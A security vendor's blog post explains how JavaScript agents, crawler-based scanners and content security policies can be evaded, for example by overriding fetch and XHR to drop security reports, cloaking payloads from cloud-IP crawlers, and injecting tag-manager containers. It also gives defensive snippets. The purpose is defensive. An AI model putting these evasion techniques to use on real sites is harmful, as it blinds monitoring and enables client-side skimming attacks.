In This Blog:
- Why you should test your compliance tools
- How to bypass JavaScript agents
- How to bypass CSP
- How to bypass crawlers
- Defense tips + safer alternatives
- Disclaimers & disclosure

Important — purpose & scope. This article is published for educational and defensive purposes only. The examples are intended to explain general browser behavior and design limitations that can affect client-side security tooling; they are not a step-by-step attack manual, and they are not targeted at any specific vendor, product, or organization. We do not condone illicit use of any techniques discussed here. If you discover a vulnerability related to content in this post, please follow responsible disclosure — see the "Responsible disclosure" section at the end of this post. All testing was conducted in accordance with the applicable vendor terms of service and applicable laws.
“In a world where compliance tools can fail on basic circumvention techniques, no one is any safer and false senses of security enlarge the issues at hand.”
— Simon Wijckmans, CEO, cside
We went back and forth on whether to write this article. On one hand, we do not want to single out vendors. On the other, when security solutions are sold but can be easily bypassed we’re all at risk. We started cside to build a safer internet. One that our family members and friends could use without worrying too much about security. Sometimes that means calling out weaknesses in security perimeters, especially when they stem from well-known platform constraints.
While we respect that for a lot of businesses, compliance requires a tool that just checks a box - compliance is an opportunity to improve the security of a platform. Especially when these compliance requirements were created for the purpose of preventing attacks from executing.
Imagine a state-of-the-art smoke detector that flawlessly detects a fire but has its alarm wire cut before it can sound the warning. The detection is perfect, but the response never happens. This is the dangerous reality for some client-side security solutions operating within a web browser.
When a browser loads a page, scripts execute in the same JavaScript environment and can interact with shared global objects. Under certain conditions this can allow one script to observe or modify another. Even sophisticated client-side detections can be limited if their outbound reporting is disrupted. This is a practical risk that defenders should consider when relying on purely client-side telemetry. A malicious script can interfere with a security tool's outbound reporting, which in some cases may significantly reduce visibility into an ongoing incident.
For that reason, cside decided not to fully rely on client-side based detections but instead opt for a more advanced yet nuanced approach.
How to bypass a JavaScript Agent
The primary way a browser communicates with a server is through network requests, typically using the fetch API or XMLHttpRequest (XHR). To a developer, these might seem like fundamental, unchangeable parts of the browser. In reality, they are simply properties on the global window object that any script can redefine.
Many legitimate scripts interact with the fetch API, this is a common and generally known approach.
However, a script can leverage these APIs to interact with outbound call of client-side security vendors. This is easily done by:
- Redefining window.fetch to inspect or block outgoing security reports.
- Modify XMLHttpRequest.prototype.send to intercept and discard alerts.
- Wrap these functions to alter request payloads, strip security headers, or log sensitive data.
Let's see just how simple this is. Imagine your site loads two scripts:
- A third-party chat plugin that has been compromised.
- A security tool.
Now, here is the code that the compromised plugin.js might contain. Like many scripts do for legitimate purposes, it interacts with the XMLHttpRequest browser API. Below is some general software behavior.
With this general code behaviour running, your security tool is effectively impeded. It might still detect malicious behavior, but its calls for help (fetch or XHR requests) are intercepted and dropped into a void. You'll never know an attack took place.

How this can be prevented
Preventing this issue for fetch requests is dead easy, just copy a local version of it, you don't even need to rename anything.
// Store `fetch` locally to reuse later: const { fetch } = window; // Use a local version of fetch later in the code: fetch(...)XHR is a bit more work, but still, possible with a couple lines of code
// Store prototypes locally to reuse later: const { apply } = Reflect; const { open, send } = XMLHttpRequest.prototype; const { XMLHttpRequest } = window; // In an async part of the code: const request = new XMLHttpRequest(); apply(open, request, ["POST", "/endpoint"]); apply(send, request, []);Our analysis of common detection methodologies suggests these solutions could be susceptible to the above documented bypass concepts.
We highly recommend that any security provider looks into these approaches to help protect your customers.
How to bypass a Crawler
A crawler originates from an IP address, like any request would. However, crawlers run on cloud provider IP addresses. A client-side fetched script sees the IP address and many other attributes inside the request header from which the request is made and based on that decides what it responds with.
This is logical and exists for good reason. A marketing tool may serve different versions of its script based on the browser the request is made from or based on where the user is based to simplify privacy framework compliance. Client-side scripts are dynamic for good reason.
However, this is an opportunity for a bad actor. To illustrate:
The above example can be on any type of web server including simple PaaS platforms that don’t require any level of verification.
What the above script does is rather simple.When a request is made from a cloud provider, serve a clean script. Any other request gets a bad script.
Of course, the bad actor could add more logic. Like, only serve the bad script if the developer tools are closed and only 5% of the time. Making it harder to detect by manual review.
This can substantially reduce the visibility a crawler-based solution has for targeted attacks.
Using a residential proxy to appear like a normal residential user is unlikely to make a significant difference. A bad actor can still detect the use of a residential proxy.
Another easy method is making a client-side subrequest based on browser available parameters. This allows the full extent of browser APIs to be used to decide whether or not to make a subrequest.
Many crawler based solutions simply check the source URL against a list of known bad domain names procured from threat feed providers. The problem with this approach is that a targeted attack will not be flagged and that it can take a long time for an attack to get noticed. Bad actors can also easily avoid malicious domain detection by using commonly used domain names like googletagmanager.com to host the malicious scripts.
A crawler based solution approaches a security threat that is dynamic with a static security mindset. While convenient, this does not work by design.
Based on publicly documented fundamental browser capabilities and standard JavaScript functionality, crawler-based approaches may face the limitations described above. We encourage vendors to clearly document any such limitations so customers can make informed deployment decisions.
How to bypass CSP
Another commonly used security approach is content security policies.
CSP can be helpful at limiting the exposure by reducing the scope of allowed sources. But, many websites use tools that are open to the whole world to upload scripts to. If a policy is not tight enough, this will lead to an easy bypass. But even if a policy is tight enough, an attacker may choose to perform the attack in a way that CSP does not monitor it.
How this would work. Once a bad actor finds its way into a web application, they can inject a subrequest to a google tag manager container. Example:
<script async src="https://www.googletagmanager[.]com/gtm.js?id=GTM-XXXXXX"></script>Inside of this container, they can include any scripts they wish. Including in-line scripts which are even harder to secure.
Since CSP has no real context of script payload, the visibility is rather limited.
Some solutions attempt to change this by making a fetch to the script after the fact.
But the same problem as the crawler would show: anything that looks non-human is likely going to receive another response than a human user would.
While you could specify the tag manager container in the CSP, this is not very common. There are also other domains like Githubusercontent that face this same issue.
And ultimately, if a source is compromised either by an incident at the vendor or by the domain name expiring. CSP will be unable to help.
Contrary to the client-side script method, we haven’t been able to find a reliable technique within CSP that would avoid these bypass methods.
CSP has limitations. CSP is being used for more than it was initially designed for.
Companies that adopt CSP often struggle to maintain it and deal with regular outages of client-side tools when policies block changes.
Safer alternatives (the cside approach)
The cside team has substantial experience in client-side security. Throughout our experiences we identified that bad actors are operating at a level of sophistication that takes the upper hand over some security approaches. If the reward is high, any gap in a security detection model is an opportunity for a bad actor.
Given browsers specification limitations for client-side security, we’ve had to get creative which is why we approached client-side security with the ability to intercept scripts through a hybrid proxy.
- Proxy-side detection: By performing security checks on the server, we ensure that suspicious activity is always captured, regardless of client-side tampering.
- Client-side detections: Customer trusted scripts from reputable vendors get monitored client-side. Removing the proxy from the flow of the request. However, as soon as suspicions arise, the proxy can intercept the requests for deeper analysis.
- Client-side safeguards: We add an extra layer on the client to prevent request tampering, this is supplementary to our main server-side protections.
The mix of the above brings us closest to full coverage. cside actively contributes to the W3C in the hopes of creating attention to client-side security. Aiming to make adjustments to the browser specification to allow for fully bulletproof client-side security.
At cside, we capture attacks. If you are reading this blogpost, you are likely a sufficiently high value target for a bad actor to invest some level of mental capacity to inspect how your web security works. It is better to be safe and assume a bad actor will attempt to bypass security solutions you use. So use solutions that think a step ahead.
Disclaimer & Legal Safe Harbor
This post is for informational and educational purposes only. It does not constitute legal advice, and the views and technical analysis expressed are our own. Nothing here should be taken as an admission of liability by any party.
None of the above mentioned approaches or code samples are advanced or solely used for malicious purposes. These are basic JavaScript use-case, in no way is this proprietary. The snippets shared are actively used in client-side scripts for legitimate purposes. We are not responsible for any use of these basic JavaScript functions by a malicious party.
All example code and pseudo-code are illustrative only. They are intentionally generic, non-proprietary, and not designed to run in real environments. Their purpose is to highlight defensive considerations, not to provide attackers with working exploits.
Please note: attempting to apply these techniques on systems you do not own, or without explicit permission, may violate laws such as the U.S. Computer Fraud and Abuse Act, the UK Computer Misuse Act, or similar rules in other jurisdictions.
We actively support good-faith security research. If you follow the Responsible Disclosure process outlined below, we will treat your research as authorized and will not take legal action against you. In short, this content is provided to help defenders strengthen protections — not to enable malicious behavior.
Responsible Disclosure
If you believe you have discovered a vulnerability related to content in this post (including third-party scripts or integrations we reference), please do not publish exploit details publicly. Instead, email us at
[email protected] with the subject line “Vulnerability report — [short title]”.
Include reproducible steps, affected URLs, and a secure contact method. We will acknowledge receipt within 5 business days and coordinate remediation. We will not pursue legal action against good-faith reporters who follow these guidelines.